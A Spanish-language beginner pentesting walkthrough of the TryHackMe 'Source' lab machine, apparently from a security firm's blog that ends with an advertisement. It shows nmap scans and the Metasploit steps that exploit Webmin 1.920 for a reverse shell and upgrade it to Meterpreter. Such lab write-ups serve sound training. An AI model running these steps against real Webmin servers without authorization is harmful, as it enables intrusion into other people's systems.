Manual de Pentesting para Principiantes Utilizando la Máquina Source TryHackMe. Máquina para empezar en el pentesting y en el uso de herramientas como nmap y metasploit
Parte 1: Preparación
Antes de comenzar con el pentesting en la máquina Source, es importante realizar algunas configuraciones iniciales.
Paso 1: Crear directorio de trabajo y editar el archivo de hosts Source TryHackMe
- Descripción: Para organizar el proyecto, crearemos un directorio de trabajo y editaremos el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.
- Comandos:
- Crear directorio de trabajo: Abre una terminal y ejecuta el siguiente comando:
mkdir directorio_trabajo
- Editar archivo hosts: Ejecuta
nano /etc/hosts
para abrir el archivo hosts en el editor de texto. - Agregar la siguiente línea al archivo hosts:
<ip_maquina> nombredominio
(reemplaza<ip_maquina>
con la dirección IP de la máquina objetivo y «nombredominio» con el nombre que desees asignar).
Parte 2: Escaneo y Reconocimiento de Source TryHackMe
El escaneo y reconocimiento son pasos fundamentales en un pentesting. Nos permiten obtener información sobre la máquina objetivo y los servicios que están en ejecución.
Paso 2: Realizar ping a la máquina y descubrir el TTL
- Descripción: Realiza un ping a la dirección IP de la máquina objetivo para verificar que está en línea y obtener información como el TTL (Time To Live).
- Comando: Abre una terminal y ejecuta el siguiente comando:
ping -c 1 <ip_maquina>
- TTL: El TTL obtenido en la respuesta del ping puede ayudarnos a identificar el sistema operativo de la máquina objetivo. Un TTL de 63 generalmente indica un sistema operativo Linux.
Paso 3: Hacer un primer escaneo con nmap en Source TryHackMe
- Descripción: Realiza un escaneo de puertos básico utilizando nmap para identificar los servicios asociados a los puertos abiertos.
- Comando: En la terminal, ejecuta:
nmap -sVC -oN nmap_source <ip_maquina>
- Servicios encontrados:
- Puerto 22: El servicio asociado al puerto 22 es SSH (Secure Shell), que proporciona un acceso remoto seguro a la máquina.
- Puerto 10000: Es posible que este puerto esté asociado a Webmin, un panel de administración web para sistemas Unix.
Parte 3: Escaneo Completo y Detección de Vulnerabilidades en Source TryHackMe
El siguiente paso es realizar un escaneo completo de puertos en la máquina objetivo y utilizar herramientas para detectar vulnerabilidades.
Paso 4: Escaneo completo de la máquina con nmap
- Descripción: Realiza un escaneo completo de puertos en la máquina objetivo, identificando los servicios y versiones asociados a cada puerto. También utiliza scripts de detección de vulnerabilidades.
- Comando: Ejecuta en la terminal:
nmap -p 22,10000 -sCVS --min-rate 5000 -v -n -Pn <ip_maquina> -oN nmap_source_completo
- Desglose de los comandos:
-p 22,10000
: Escanea únicamente los puertos 22 y 10000.-sCVS
: Realiza un escaneo de versiones y scripts de detección de vulnerabilidades.--min-rate 5000
: Establece una tasa mínima de envío de paquetes para acelerar el escaneo.-v
: Activa el modo verboso para obtener más información detallada.-n
: Desactiva la resolución de nombres DNS.-Pn
: Ignora el descubrimiento de host y trata todas las direcciones como en línea.-oN nmap_source_completo
: Guarda los resultados en un archivo llamado «nmap_source_completo».
Paso 5: Búsqueda de exploits para versiones vulnerables
- Descripción: Busca exploits disponibles en Metasploit para las versiones específicas de OpenSSH (7.6p1) y Webmin (1.920).
- Comandos en Metasploit:
- Ejecuta
msfconsole
en la terminal para iniciar Metasploit. - Utiliza
search webmin 1.920
para buscar exploits relacionados con Webmin 1.920. - Selecciona el exploit específico que deseas utilizar con el comando
use X
.
- Utiliza
options
para ver y configurar las opciones del exploit seleccionado. - Establece la dirección IP de la máquina objetivo como objetivo del exploit con el comando
set RHOSTS <ip_maquina>
. - Establece la dirección IP de la interfaz «tun0» o la dirección IP de tu VPN como dirección de origen del exploit con el comando
set LHOST tun0
. - Habilita el uso de SSL en la comunicación con
set SSL yes
. - Ejecuta el exploit con el comando
run
y realiza el intento de explotación.
Parte 4: Mejora de la Shell y Exploración
Después de obtener acceso a la máquina objetivo, podemos mejorar la shell y explorar los directorios y archivos relevantes en busca de banderas o evidencias.
Paso 6: Mejora de la shell con Meterpreter
- Descripción: Mejora la shell obtenida mediante el exploit utilizando Meterpreter para obtener capacidades avanzadas.
- Comandos en Metasploit:
- Presiona
Ctrl + Z
para poner en pausa Metasploit y acceder al shell. - Utiliza
search shell_to_meterpreter
para buscar una carga útil compatible con la mejora de shell a Meterpreter. - Selecciona la carga útil específica que deseas utilizar con el comando
use 0
. - Establece la sesión en la que se encuentra la shell para la mejora a Meterpreter con
set SESSION 1
. - Ejecuta la carga útil y realiza la mejora de shell con el comando
run
.
- Para acceder a Meterpreter, utiliza el comando
sessions 2
.
Paso 7: Exploración y búsqueda de banderas
- Descripción: Una vez obtenido el acceso a la máquina, explora los directorios y archivos relevantes para encontrar las banderas o evidencias requeridas.
¡Enhorabuena! Has realizado los pasos necesarios para escanear, identificar vulnerabilidades y obtener acceso a la máquina objetivo. Recuerda que este manual es con fines educativos y solo debe ser utilizado en sistemas y redes donde tengas autorización para realizar pruebas de penetración.
Resumen y Tipo de Máquina de Source TryHackMe
En este manual, hemos cubierto los pasos esenciales para realizar un pentesting en la máquina Source. Comenzamos preparando nuestro entorno de trabajo y editando el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.
Luego, realizamos un escaneo inicial utilizando nmap para identificar los servicios asociados a los puertos abiertos. Continuamos con un escaneo completo de la máquina objetivo, utilizando nmap para obtener información detallada sobre los servicios y versiones.
A continuación, exploramos la búsqueda de exploits para versiones vulnerables en Metasploit y utilizamos diferentes comandos para configurar y ejecutar un exploit específico.
Una vez obtenido el acceso a la máquina, mejoramos nuestra shell utilizando Meterpreter para obtener capacidades avanzadas y exploramos los directorios y archivos relevantes en busca de banderas o evidencias.
En resumen, hemos seguido una metodología de pentesting que abarca desde el escaneo y reconocimiento inicial hasta la explotación y la exploración de la máquina objetivo.
Confía en DCSeguridad
Si estás interesado en fortalecer la seguridad de tu empresa y proteger tu red contra posibles vulnerabilidades, te invitamos a contactar a DCSeguridad. Somos expertos en ciberseguridad y podemos ayudarte a evaluar y mejorar la seguridad de tu infraestructura. También te invitamos a unirte a nuestro canal de Telegram, donde compartimos información relevante sobre seguridad y te mantendremos al tanto de las últimas noticias y tendencias en el campo de la ciberseguridad.
¡No esperes más para proteger tu empresa! Contáctanos y fortalece tu seguridad hoy mismo.